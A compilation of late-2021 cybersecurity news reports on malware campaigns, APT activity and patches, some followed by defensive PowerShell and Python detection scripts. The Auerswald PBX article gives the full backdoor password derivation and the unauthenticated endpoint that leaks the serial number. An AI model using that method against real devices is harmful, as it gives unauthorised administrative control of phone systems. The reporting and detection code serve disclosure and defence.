

New BLISTER Malware Using Code Signing Certificates to Evade Detection
27.12.2021
Virus Thehackernews
Cybersecurity researchers have disclosed details of an evasive malware campaign that makes use of valid code signing certificates to sneak past security defenses and stay under the radar with the goal of deploying Cobalt Strike and BitRAT payloads on compromised systems.

The binary, a loader, has been dubbed "Blister" by researchers from Elastic Security, with the malware samples having negligible to zero detections on VirusTotal. As of writing, the infection vector used to stage the attack, as well as the ultimate objectives of the intrusion, remains unknown.

A notable aspect of the attacks is that they leverage a valid code signing certificate issued by Sectigo. The malware has been observed signed with the certificate in question dating back to September 15, 2021. Elastic said it reached out to the company to ensure that the abused certificates are revoked.

"Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables," researchers Joe Desimone and Samir Bousseaden said. "Their use allows attackers to remain under the radar and evade detection for a longer period of time."

Blister masquerades as a legitimate library called "colorui.dll" and is delivered via a dropper named "dxpo8umrzrr1w6gm.exe." Post execution, the loader is designed to sleep for 10 minutes, likely in an attempt to evade sandbox analysis, only to follow it up by establishing persistence and decrypting an embedded malware payload such as Cobalt Strike or BitRAT.

"Once decrypted, the embedded payload is loaded into the current process or injected into a newly spawned WerFault.exe [Windows Error Reporting] process," the researchers noted. Additional indicators of compromise (IoCs) associated with the campaign can be accessed here.
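The point the Elastic researchers make is that a valid Authenticode signature lowers the scrutiny a binary receives, not the risk it carries. The PowerShell below is an added triage example, not code from Elastic's report: it walks a directory, records signer, issuer, thumbprint and certificate issue date for every signed PE file, and surfaces binaries whose signature is valid but whose signer is not on a local allow-list. `$Path` and `$TrustedSubjects` are placeholder values chosen for illustration.

```powershell
# Added example (not from the Elastic report): triage signed binaries by signer.
# Assumptions: Windows host with PowerShell 5.1 or later; $Path and the
# allow-list are placeholders to be replaced with the organisation's own values.
param(
    [string]$Path = "$env:USERPROFILE\Downloads",
    # Signers trusted outright, matched as a prefix of the certificate Subject.
    [string[]]$TrustedSubjects = @('CN=Microsoft Windows', 'CN=Microsoft Corporation')
)

# Collect the signature facts for every executable and DLL under $Path.
$findings = Get-ChildItem -Path $Path -Recurse -Include *.exe, *.dll -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sig  = Get-AuthenticodeSignature -FilePath $_.FullName
        $cert = $sig.SignerCertificate
        [pscustomobject]@{
            File       = $_.FullName
            Status     = $sig.Status            # Valid, NotSigned, HashMismatch, UnknownError ...
            Subject    = if ($cert) { $cert.Subject }    else { $null }
            Issuer     = if ($cert) { $cert.Issuer }     else { $null }
            NotBefore  = if ($cert) { $cert.NotBefore }  else { $null }
            Thumbprint = if ($cert) { $cert.Thumbprint } else { $null }
        }
    }

# A valid signature is a fact about the certificate chain, not a verdict on the
# file. Keep only binaries that chain correctly but come from a signer outside
# the allow-list, and order them by how recently the certificate was issued:
# a young certificate on a rarely seen signer is the pattern a loader such as
# Blister relies on to pass as benign.
$review = foreach ($f in $findings) {
    if ($f.Status -ne 'Valid') { continue }
    $trusted = $false
    foreach ($t in $TrustedSubjects) {
        if ($f.Subject -like "$t*") { $trusted = $true }
    }
    if (-not $trusted) { $f }
}

$review | Sort-Object NotBefore -Descending |
    Format-Table File, Subject, Issuer, NotBefore, Thumbprint -AutoSize
```

The thumbprint column is there so that, once a vendor publishes the certificate used in a campaign, the list can be matched against it directly; the unsigned and hash-mismatch entries in `$findings` deserve their own pass, since the absence of a valid signature is the more common state for malware.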


New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw
27.12.2021
Virus Thehackernews
A short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.

"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker," SophosLabs researchers Andrew Brandt and Stephen Ormandy said in a new report published Tuesday.

CVE-2021-40444 (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 Patch Tuesday updates, it has been put to use in multiple attacks ever since details pertaining to the flaw became public.

That same month, the technology giant uncovered a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs reported details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.

The new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available proof-of-concept Office exploit and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a "too-narrowly focused patch."

"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file," the researchers explained. "When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive."

CAB-less 40444, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host (WSH) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.

Consequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the Formbook malware payload from an attacker-controlled website.

As for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. "So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release," the researchers said.

"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases," SophosLabs Principal Researcher Andrew Brandt said. "Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button."

"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know," Brandt added. When reached for a response, a Microsoft spokesperson said "we are investigating these reports and will take appropriate action as needed to help keep customers protected."


Tropic Trooper Cyber Espionage Hackers Targeting Transportation Sector
27.12.2021
Virus Thehackernews
The transportation industry and government agencies related to the sector are the victims of an ongoing campaign since July 2020 by a sophisticated and well-equipped cyberespionage group in what appears to be yet another uptick in malicious activities that are "just the tip of the iceberg."

"The group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories)," Trend Micro researchers Nick Dai, Ted Lee, and Vickie Su said in a report published last week.

Earth Centaur, also known by the monikers Pirate Panda and Tropic Trooper, is a long-running threat group focused on information theft and espionage that has led targeted campaigns against government, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong dating all the way back to 2011.

The hostile agents, believed to be a Chinese-speaking actor, are known for their use of spear-phishing emails with weaponized attachments to exploit known vulnerabilities, while simultaneously advancing their malicious tools with obfuscation, stealthiness, and striking power.

"This threat group is proficient at red teamwork," the researchers elaborated. "The group knows how to bypass security settings and keep its operation unobstructive. The usage of the open-source frameworks also allows the group to develop new backdoor variants efficiently."

In May 2020, the operators were observed fine-tuning their attack strategies with new behaviors by deploying a USB trojan dubbed USBFerry to strike physically isolated networks belonging to government institutions and military entities in Taiwan and the Philippines in a bid to siphon sensitive data through removable flash drives.

The latest multi-stage intrusion sequence detailed by Trend Micro involves the group turning to exploit vulnerable Internet Information Services (IIS) servers and Exchange server flaws as entry points to install a web shell that's then leveraged to deliver a .NET-based Nerapack loader and a first-stage backdoor known as Quasar on the compromised system.

From there, the attackers follow it up by dropping an arsenal of second-stage implants like ChiserClient, SmileSvr, ChiserClient, HTShell, and bespoke versions of Lilith RAT and Gh0st RAT depending on the victim to retrieve further instructions from a remote server, download additional payloads, perform file operations, execute arbitrary commands, and exfiltrate results back to the server.

It doesn't end there. After successful exploitation of the system, Tropic Trooper also attempts to breach the intranet, dump credentials, and wipe out event logs from the infected machines using a specific set of tools. Also put to use is a command-line program called Rclone that enables the actor to copy harvested data to different cloud storage providers.

"Currently, we have not discovered substantial damage to these victims as caused by the threat group," Trend Micro's analysts explained. "However, we believe that it will continue collecting internal information from the compromised victims and that it is simply waiting for an opportunity to use this data."

The findings are noteworthy because of the steps the advanced persistent threat (APT) takes to avoid detection and the critical nature of the targeted entities, not to mention the new capabilities developed for their malicious software to linger on infected hosts and avoid detection.

"The group can map their target's network infrastructure and bypass firewalls," the researchers said. "It uses backdoors with different protocols, which are deployed depending on the victim. It also has the capability to develop customized tools to evade security monitoring in different environments, and it exploits vulnerable websites and uses them as [command-and-control] servers."
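The entry point Trend Micro describes is a web shell dropped on a vulnerable IIS or Exchange server. The PowerShell below is an added hunting example, not code from the Trend Micro report: it lists script files under the product-default IIS and Exchange web roots that were created or modified within a lookback window and records their size and hash for triage. The root paths, the 30-day window and the extension list are assumptions to be adjusted to the host.

```powershell
# Added example (not from the Trend Micro report): list recently created or
# modified server-side script files under IIS and Exchange web roots.
# Assumptions: paths are the product defaults; window and extensions are placeholders.
$WebRoots = @(
    "$env:SystemDrive\inetpub\wwwroot",
    "$env:ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy",
    "$env:ProgramFiles\Microsoft\Exchange Server\V15\ClientAccess"
)
$LookbackDays = 30                                    # assumed window
$Extensions   = @('*.aspx', '*.ashx', '*.asmx', '*.asp', '*.php')
$since        = (Get-Date).AddDays(-$LookbackDays)

$hits = foreach ($root in $WebRoots) {
    if (-not (Test-Path -Path $root)) { continue }    # skip roots that do not exist on this host
    Get-ChildItem -Path $root -Recurse -File -Include $Extensions -ErrorAction SilentlyContinue |
        Where-Object { $_.CreationTime -ge $since -or $_.LastWriteTime -ge $since } |
        ForEach-Object {
            # Web shells are usually small single files; size and hash make them easy to
            # compare across servers and against published indicators.
            [pscustomobject]@{
                Path     = $_.FullName
                Created  = $_.CreationTime
                Modified = $_.LastWriteTime
                Bytes    = $_.Length
                SHA256   = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        }
}

$hits | Sort-Object Created -Descending | Format-Table -AutoSize
```

File timestamps can be altered by an intruder, so a hit list like this is a starting point to corroborate against the IIS request logs for the same paths, not a verdict on its own.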


Secret Backdoors Found in German-made Auerswald VoIP System
27.12.2021
Virus Thehackernews
Multiple backdoors have been discovered during a penetration test in the firmware of a widely used voice over Internet Protocol (VoIP) appliance from Auerswald, a German telecommunications hardware manufacturer, that could be abused to gain full administrative access to the devices.

"Two backdoor passwords were found in the firmware of the COMpact 5500R PBX," researchers from RedTeam Pentesting said in a technical analysis published Monday. "One backdoor password is for the secret user 'Schandelah', the other can be used for the highest-privileged user 'admin.' No way was discovered to disable these backdoors."

The vulnerability has been assigned the identifier CVE-2021-40859 and carries a critical severity rating of 9.8. Following responsible disclosure on September 10, Auerswald addressed the problem in a firmware update (version 8.2B) released in November 2021. "Firmware Update 8.2B contains important security updates that you should definitely apply, even if you don't need the advanced features," the company said in a post without directly referencing the issue.

PBX, short for private branch exchange, is a switching system that serves a private organization. It's used to establish and control telephone calls between telecommunication endpoints, including customary telephone sets, destinations on the public switched telephone network (PSTN), and devices or services on VoIP networks.

RedTeam Pentesting said it uncovered the backdoor after it began to take a closer look into a service Auerswald provides in the event a customer were to lose access to their administrator account, in which case the password associated with the privileged account can be reset by reaching out to the manufacturer.

Specifically, the researchers found that the devices are configured to check for a hard-coded username "Schandelah" besides "sub-admin," the account that's necessary to manage the device according to the official documentation. "It turns out that Schandelah is the name of a tiny village in northern Germany where Auerswald produces their devices," the researchers said.

Follow-on investigation by the German pen-testing firm revealed that "the corresponding password for this username is derived by concatenating the PBX's serial number, the string 'r2d2,' and the current date [in the format 'DD.MM.YYYY'], hashing it with the MD5 hash algorithm and taking the first seven lower-case hex chars of the result."

Put simply, all an attacker needs to generate the password for the username "Schandelah" is to obtain the serial number of the PBX — a piece of information that can be trivially retrieved using an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain access to a web interface that allows for resetting the administrator password.

On top of that, the researchers said they identified a second backdoor when the administrative username "admin" is passed, for which a fallback password is programmatically derived using the aforementioned algorithm, only difference being that a two-letter country code is suffixed to the concatenated string prior to creating the MD5 hash. The alternative password, as in the previous case, provides full-privileged access to the PBX without having to change the password in the first place.

"Using the backdoor, attackers are granted access to the PBX with the highest privileges, enabling them to completely compromise the device," the researchers said. "The backdoor passwords are not documented. They secretly coexist with a documented password recovery function supported by the vendor."


Experts Discover Backdoor Deployed on the U.S. Federal Agency's Network
20.12.2021
Virus Thehackernews

A U.S. federal government commission associated with international rights has been targeted by a backdoor that reportedly compromised its internal network in what the researchers described as a "classic APT-type operation."

"This attack could have given total visibility of the network and complete control of a system and thus could be used as the first step in a multi-stage attack to penetrate this, or other networks more deeply," Czech security company Avast said in a report published last week.

The name of the federal entity was not disclosed, but reports from Ars Technica and The Record tied it to the U.S. Commission on International Religious Freedom (USCIRF). Avast said it was making its findings public after unsuccessful attempts to directly notify the agency about the intrusion and through other channels put in place by the U.S. government.

At this stage, only "parts of the attack puzzle" have been uncovered, leaving the door open for a lot of unknowns with regards to the nature of the initial access vector used to breach the network, the sequence of post-exploitation actions taken by the actor, and the overall impact of the compromise itself.

What's known is that the attack was carried out in two stages to deploy two malicious binaries that enabled the unidentified adversary to intercept internet traffic and execute code of their choosing, permitting the operators to take complete control over the infected systems. It achieves this by abusing WinDivert, a legitimate packet capturing utility for Windows.

Interestingly, not only do both samples masquerade as an Oracle library named "oci.dll," but the second-stage decryptor deployed during the attack was found to share similarities with another executable detailed by Trend Micro researchers in 2018, which delved into an information theft-driven supply chain attack dubbed "Operation Red Signature" aimed at organizations in South Korea. The overlaps have led the Avast Threat Intelligence Team to suspect that the attackers have had access to the source code of the latter.

"It is reasonable to presume that some form of data gathering and exfiltration of network traffic happened, but that is informed speculation," the researchers said. "That said, we have no way to know for sure the size and scope of this attack beyond what we've seen."


New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021
20.12.2021 
Virus Thehackernews
Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManuscrypt that has infected roughly 35,000 Windows computers this year alone.

The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group's attack toolset, Kaspersky researchers said, characterizing the operation as a "mass-scale spyware attack campaign." The Russian cybersecurity company said it first detected the series of intrusions in June 2021.

At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.3%).

"The PseudoManuscrypt loader makes its way onto user systems via a MaaS platform that distributes malware in pirated software installer archives," the Kaspersky ICS CERT team said. "One specific case of the PseudoManuscrypt downloader's distribution is its installation via the Glupteba botnet."

Coincidentally, Glupteba's operations have also taken a significant hit after Google earlier this month disclosed that it acted to dismantle the botnet's infrastructure and it's pursuing a litigation against two Russian nationals, who are alleged to have managed the malware along with 15 other unnamed individuals.

The cracked installers used to fuel the botnet include Windows 10, Microsoft Office, Adobe Acrobat, Garmin, Call of Duty, SolarWinds Engineer's Toolset, and even Kaspersky's own antivirus solution. The pirated software installations are driven by a method called search poisoning in which the attackers create malicious websites and use search engine optimization (SEO) tactics to make them show up prominently in search results.

Once installed, PseudoManuscrypt comes with an array of intrusive capabilities that gives the attackers full control of the infected system. This consists of disabling antivirus solutions, stealing VPN connection data, logging keystrokes, recording audio, capturing screenshots and videos of the screen, and intercepting data stored in the clipboard.

Kaspersky noted it has identified 100 different versions of the PseudoManuscrypt loader, with the earliest test variants dating back to March 27, 2021. Components of the trojan have been borrowed from commodity malware like Fabookie and a KCP protocol library employed by the China-based APT41 group for sending data back to the attackers' command-and-control (C2) servers.

The malware samples analyzed by the ICS CERT also featured comments written in Chinese and were found specifying Chinese as the preferred language when connecting to the C2 server, but these clues alone have been inconclusive to make an assessment about the malware's operators or their origins. Also unclear are the ultimate goals of the campaign, raising questions as to whether the attacks are financially motivated or state-backed.

"The large number of engineering computers attacked, including systems used for 3D and physical modeling, the development and use of digital twins raises the issue of industrial espionage as one of the possible objectives of the campaign," the researchers said.


New Fileless Malware Uses Windows Registry as Storage to Evade Detection
20.12.2021 
Virus Thehackernews
A new JavaScript-based remote access Trojan (RAT) propagated via a social engineering campaign has been observed employing sneaky "fileless" techniques as part of its detection-evasion methods to elude discovery and analysis.

Dubbed DarkWatchman by researchers from Prevailion's Adversarial Counterintelligence Team (PACT), the malware uses a resilient domain generation algorithm (DGA) to identify its command-and-control (C2) infrastructure and utilizes the Windows Registry for all of its storage operations, thereby enabling it to bypass antimalware engines.

The RAT "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith said, adding it "represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools."

Prevailion said that an unnamed enterprise-sized organization in Russia was one among the targeted victims, with a number of malware artifacts identified starting November 12, 2021. Given its backdoor and persistence features, the PACT team assessed that DarkWatchman could be an initial access and reconnaissance tool for use by ransomware groups.

An interesting consequence of this novel development is that it completely obviates the need for ransomware operators to recruit affiliates, who are typically in charge of dropping the file-locking malware and handling the file exfiltration. Using DarkWatchman as a prelude for ransomware deployments also equips the core developers of the ransomware with better oversight over the operation beyond negotiating ransoms.

Distributed via spear-phishing emails that masquerade as "Free storage expiration notification" for a consignment delivered by Russian shipment company Pony Express, DarkWatchman provides a stealthy gateway for further malicious activity. The emails come attached with a purported invoice in the form of a ZIP archive that, in turn, contains the payload necessary to infect the Windows system.

The novel RAT is both a fileless JavaScript RAT and a C#-based keylogger, the latter of which is stored in the registry to avoid detection. Both the components are also extremely lightweight. The malicious JavaScript code just takes about 32kb, while the keylogger barely registers at 8.5kb.

"The storage of the binary in the registry as encoded text means that DarkWatchman is persistent yet its executable is never (permanently) written to disk; it also means that DarkWatchman's operators can update (or replace) the malware every time it's executed," the researchers said.

Once installed, DarkWatchman can execute arbitrary binaries, load DLL files, run JavaScript code and PowerShell commands, upload files to a remote server, update itself, and even uninstall the RAT and keylogger from the compromised machine. The JavaScript routine is also responsible for establishing persistence by creating a scheduled task that runs the malware at every user log on.

"The keylogger itself does not communicate with the C2 or write to disk," the researchers said. "Instead, it writes its keylog to a registry key that it uses as a buffer. During its operation, the RAT scrapes and clears this buffer before transmitting the logged keystrokes to the C2 server."

DarkWatchman has yet to be attributed to a hacking group, but Prevailion characterized the crew as a "capable threat actor," alongside pointing out the malware's exclusive targeting of victims located in Russia and the typographical errors and misspellings that were identified in the source code samples, raising the possibility that the operators may not be native English speakers.

"It would appear that the authors of DarkWatchman identified and took advantage of the complexity and opacity of the Windows Registry to work underneath or around the detection threshold of security tools and analysts alike," the researchers concluded. "Registry changes are commonplace, and it can be difficult to identify which changes are anomalous or outside the scope of normal OS and software functions."
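Two of the traits Prevailion describes are concrete enough to hunt for: a scheduled task with a logon trigger that launches a script host, and a payload stored in the registry as a large encoded string. The PowerShell below is an added detection example, not code from the Prevailion report: it lists logon-triggered tasks whose action is a script host, then scans HKCU for string or binary values above a size threshold. The script-host list and the 4096-byte threshold are assumptions to be tuned against a baseline.

```powershell
# Added example (not from the Prevailion report): hunt for DarkWatchman-style
# traits, a logon-triggered scheduled task that runs a script host and
# unusually large values under HKCU. Thresholds and host list are placeholders.
$ScriptHosts   = @('wscript.exe', 'cscript.exe', 'mshta.exe', 'powershell.exe')
$MinBlobLength = 4096   # assumed threshold; tune against a clean baseline

# 1. Scheduled tasks that fire at logon and execute a script host.
$suspectTasks = foreach ($task in Get-ScheduledTask) {
    $logon = $task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }
    if (-not $logon) { continue }
    foreach ($action in $task.Actions) {
        # Execute may be quoted or empty for non-executable action types.
        $exe = [System.IO.Path]::GetFileName(($action.Execute -replace '"', ''))
        if ($ScriptHosts -contains $exe.ToLower()) {
            [pscustomobject]@{
                Task      = $task.TaskName
                TaskPath  = $task.TaskPath
                Execute   = $action.Execute
                Arguments = $action.Arguments
            }
        }
    }
}

# 2. Registry values large enough to hold an encoded executable or a keylog buffer.
$bigValues = Get-ChildItem -Path HKCU:\Software -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key = $_
        foreach ($name in $key.GetValueNames()) {
            $kind = $key.GetValueKind($name)
            if ($kind -ne 'String' -and $kind -ne 'Binary') { continue }
            $val = $key.GetValue($name)
            $len = if ($val -is [byte[]]) { $val.Length } else { "$val".Length }
            if ($len -ge $MinBlobLength) {
                [pscustomobject]@{ Key = $key.Name; Value = $name; Kind = $kind; Length = $len }
            }
        }
    }

$suspectTasks | Format-Table -AutoSize
$bigValues | Sort-Object Length -Descending | Select-Object -First 20 | Format-Table -AutoSize
```

As the researchers note, registry changes are commonplace and legitimate software also parks large blobs under HKCU, so the value list is only useful against a per-fleet baseline; a logon task that runs `wscript.exe` against a script path outside Program Files is the stronger of the two signals.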


Microsoft Issues Windows Update to Patch 0-Day Used to Spread Emotet Malware
17.12.2021 
Virus Thehackernews

Microsoft has rolled out Patch Tuesday updates to address multiple security vulnerabilities in Windows and other software, including one actively exploited flaw that's being abused to deliver Emotet, TrickBot, or Bazaloader malware payloads.

The latest monthly release for December fixes a total of 67 flaws, bringing the total number of bugs patched by the company this year to 887, according to the Zero Day Initiative. Seven of the 67 flaws are rated Critical and 60 are rated as Important in severity, with five of the issues publicly known at the time of release. It's worth noting that this is in addition to the 21 flaws resolved in the Chromium-based Microsoft Edge browser.

The most critical of the lot is CVE-2021-43890 (CVSS score: 7.1), a Windows AppX installer spoofing vulnerability that Microsoft said could be exploited to achieve arbitrary code execution. The lower severity rating is indicative of the fact that code execution hinges on the logged-on user level, meaning "users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."

The Redmond-based tech giant noted that an adversary could leverage the flaw by crafting a malicious attachment that's then used as part of a phishing campaign to trick the recipients into opening the email attachment. Sophos security researchers Andrew Brandt as well as Rick Cole and Nick Carr of the Microsoft Threat Intelligence Center (MSTIC) have been credited with reporting the vulnerability.

"Microsoft is aware of attacks that attempt to exploit this vulnerability by using specially crafted packages that include the malware family known as Emotet/ Trickbot/ Bazaloader," the company further added. The development comes as Emotet malware campaigns are witnessing a surge in activity after more than a 10-month-long hiatus following a coordinated law enforcement effort to disrupt the botnet's reach.

Other flaws that are publicly known are below —

CVE-2021-43240 (CVSS score: 7.8) - NTFS Set Short Name Elevation of Privilege Vulnerability
CVE-2021-43883 (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability
CVE-2021-41333 (CVSS score: 7.8) - Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2021-43893 (CVSS score: 7.5) - Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability
CVE-2021-43880 (CVSS score: 5.5) - Windows Mobile Device Management Elevation of Privilege Vulnerability
The December patch also comes with remediations for 10 remote code execution flaws in Defender for IoT, in addition to critical bugs affecting iSNS Server (CVE-2021-43215), 4K Wireless Display Adapter (CVE-2021-43899), Visual Studio Code WSL Extension (CVE-2021-43907), Office app (CVE-2021-43905), Windows Encrypting File System (CVE-2021-43217), Remote Desktop Client (CVE-2021-43233), and SharePoint Server (CVE-2021-42309).

Software Patches From Other Vendors
Besides Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, including —

Adobe
Android
Apple
Cisco
Citrix
Intel
Linux distributions Oracle Linux, Red Hat, and SUSE
SAP
Schneider Electric, and
Siemens
Furthermore, numerous security advisories have been released by dozens of companies for the actively exploited Log4j remote code execution vulnerability that could allow a complete takeover of affected systems.


Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan
17.12.2021 
Virus Thehackernews
Infection chains associated with the multi-purpose Qakbot malware have been broken down into "distinct building blocks," an effort that Microsoft said will help to proactively detect and block the threat in an effective manner.

The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a "customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it."

Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns.

First discovered in 2007, the modular malware — like TrickBot — has evolved from its early roots as a banking trojan to become a Swiss Army knife capable of data exfiltration and acting as a delivery mechanism for the second stage payloads, including ransomware. Also notable is its tactic of hijacking victims' legitimate email threads from Outlook clients via an Email Collector component and using those threads as phishing lures to infect other machines.

"Compromising IMAP services and email service providers (ESPs), or hijacking email threads allows attackers to leverage the trust a potential victim has in people they have corresponded with before, and it also allows for the impersonation of a compromised organization," Trend Micro researchers Ian Kenefick and Vladimir Kropotov detailed last month. "Indeed, intended targets will be much more likely to open emails from a recognized sender."

Qakbot activity tracked by the cybersecurity firm over a seven month period between March 25, 2021, and October 25, 2021, show that the U.S., Japan, Germany, India, Taiwan, Italy, South Korea, Turkey, Spain, and France are the top targeted countries, with the intrusions primarily striking telecommunications, technology, and education sectors.

More recently, spam campaigns have resulted in the deployment of a new loader called SQUIRRELWAFFLE that enables the attackers to gain an initial foothold into enterprise networks and drop malicious payloads, such as Qakbot and Cobalt Strike, on infected systems.

Now according to Microsoft, attack chains involving Qakbot comprise several building blocks that chart the various stages of the compromise, right from the methods adopted to distribute the malware — links, attachments, or embedded images — before carrying out an array of post-exploitation activities such as credential theft, email exfiltration, lateral movement, and the deployment of Cobalt Strike beacons and ransomware.

The Redmond-based company noted that Qakbot-related emails sent by the attackers may, at times, come with a ZIP archive file attachment that includes a spreadsheet containing Excel 4.0 macros, an initial access vector that's widely abused in phishing attacks. Regardless of the mechanism employed to deliver the malware, the campaigns have in common their use of malicious Excel 4.0 macros.

While macros are turned off by default in Microsoft Office, recipients of the email messages are prompted to enable the macro to view the document's actual content. This triggers the next phase of the onslaught to download the malicious payloads from one or more attacker-controlled domains.

More often than not, Qakbot is just the first step in a larger attack, with the threat actors using the initial foothold facilitated by the malware to install additional payloads or to sell the access on underground forums to the highest bidder, who can then leverage it for their own ends. In June 2021, enterprise security company Proofpoint revealed how ransomware actors are increasingly shifting from using email messages as an intrusion route to purchasing access from cybercriminal enterprises that have already infiltrated major entities.

"Qakbot's modularity and flexibility could pose a challenge for security analysts and defenders because concurrent Qakbot campaigns could look strikingly different on each affected device, significantly impacting how these defenders respond to such attacks," the researchers said. "Therefore, a deeper understanding of Qakbot is paramount in building a comprehensive and coordinated defense strategy against it."


Indian-Made Mobile Spyware Targeted Human Rights Activist in Togo
13.10.21 
Virus  Thehackernews

A prominent Togolese human rights defender has been targeted with spyware by a threat actor known for striking victims in South Asia, marking the hacking group's first foray into digital surveillance in Africa.

Amnesty International tied the covert attack campaign to a collective tracked as "Donot Team" (aka APT-C-35), which has been linked to cyber offensives in India and Pakistan, while also identifying apparent evidence coupling the group's infrastructure to an Indian company called Innefu Labs. The unnamed activist is believed to have been targeted over a period of two months starting in December 2019 with the help of fake Android applications and spyware-laden emails.

"The persistent attacks over WhatsApp and email tried to trick the victim into installing a malicious application that masqueraded as a secure chat application," Amnesty International said in a report published last week. "The application was in fact a piece of custom Android spyware designed to extract some of the most sensitive and personal information stored on the activist's phone."

The messages originated from a WhatsApp account associated with an Indian phone number that's registered in the state of Jammu and Kashmir. Once installed, the malicious software — which takes the form of an app named "ChatLite" — grants the adversary permissions to access the camera and microphone, gather photos and files stored on the device, and even grab WhatsApp messages as they are being sent and received.

But when the aforementioned attempt failed, the attackers switched to an alternate infection chain in which an email sent from a Gmail account contained a malware-laced Microsoft Word document that leveraged a now-patched remote code execution vulnerability (CVE-2017-0199) to drop a full-fledged Windows spying tool known as the YTY framework that grants complete access to the victim's machine.
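The CVE-2017-0199 delivery pattern mentioned above is visible in the document package itself: the lure embeds an OLE object whose relationship points to an attacker URL with TargetMode="External", and the object is marked to update on open, so Word fetched the remote content and, before the April 2017 patch, executed it as an HTA. The following Python is an added example, not Amnesty's or the article's code; the documents it scans are constructed inline, and the RTF container that many CVE-2017-0199 lures used is not covered (only OOXML).

```python
"""External OLE-object links in Word OOXML (the CVE-2017-0199 delivery pattern).

Added example, not Amnesty's or the article's code. OOXML only; the RTF
variant of the same lure needs a different parser.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_REL = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REL_PREFIX = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that should never point outside the package in a normal document.
RISKY_REL_TYPES = {
    REL_PREFIX + "oleObject": "external OLE object (CVE-2017-0199 style)",
    REL_PREFIX + "attachedTemplate": "remote template injection",
}
OLE_RE = re.compile(r"<o:OLEObject\b[^>]*>")
ATTR_RE = re.compile(r'([\w:]+)="([^"]*)"')


def external_links(data: bytes) -> list:
    """Return (owning part, kind, target, UpdateMode) for risky external relationships."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Map (part, r:id) -> OLEObject attributes, to learn whether the link auto-updates.
        ole_attrs = {}
        for part in names:
            if part.endswith(".xml") and "/_rels/" not in part:
                for tag in OLE_RE.findall(z.read(part).decode("utf-8", "replace")):
                    attrs = dict(ATTR_RE.findall(tag))
                    if attrs.get("r:id"):
                        ole_attrs[(part, attrs["r:id"])] = attrs
        for rels in names:
            if not rels.endswith(".rels"):
                continue
            owner = rels.replace("_rels/", "", 1)[:-len(".rels")]   # word/_rels/document.xml.rels -> word/document.xml
            for rel in ET.fromstring(z.read(rels)).iter(NS_REL + "Relationship"):
                kind = RISKY_REL_TYPES.get(rel.get("Type"))
                if kind and rel.get("TargetMode") == "External":
                    attrs = ole_attrs.get((owner, rel.get("Id")), {})
                    findings.append((owner, kind, rel.get("Target"), attrs.get("UpdateMode", "")))
    return findings


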